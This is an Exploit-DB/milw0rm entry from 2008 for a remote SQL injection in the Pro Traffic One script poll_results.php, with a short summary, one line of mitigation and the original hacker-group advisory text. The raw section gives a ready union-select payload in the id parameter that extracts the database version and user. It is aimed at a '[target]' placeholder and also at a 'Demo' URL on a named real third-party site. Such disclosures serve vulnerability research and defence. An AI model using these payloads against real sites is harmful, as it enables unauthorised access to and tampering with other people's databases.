Pro Traffic One( poll_results.php id) Remote SQL Injection Vulnerability

vendor:

Pro Traffic One

by:

Hussin X

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Pro Traffic One

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Pro Traffic One( poll_results.php id) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in Pro Traffic One poll_results.php script. An attacker can send a specially crafted HTTP request with an id parameter containing malicious SQL code to the vulnerable script. This can allow the attacker to view, add, modify or delete records in the back-end database.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

|___________________________________________________
|  Pro Traffic One( poll_results.php id) Remote SQL Injection Vulnerability
|___________________________________________________
|--------------------   IQ-SecuritY  -------------------
|
|    Author: Hussin X
|
|    Home :  WwW.IQ-ty.CoM
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|___________________________________________________
|                                                                                                    
|
| script :  http://www.webmasterdownload.com/
|
| DorK   :  :)
|___________________________________________________

Exploit:
________


www.[target].com/Script/poll_results.php?id=-1+union+select+1,concat(version(),0x3e,user())--


Demo
________

http://www.free4newbies.com/pro-traffic/poll_results.php?id=-1+union+select+1,concat(version(),0x3e,user())--




____________________________( Greetz )_________________________________________
|
|  All members of the Forum IQ-SecuritY  WwW.IQ-ty.CoM | AnD TrYaG  WwW.TrYaG.CC
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
|___________________________________________________________________________


                   Im IRAQi    |    Im TrYaGi

# milw0rm.com [2008-10-29]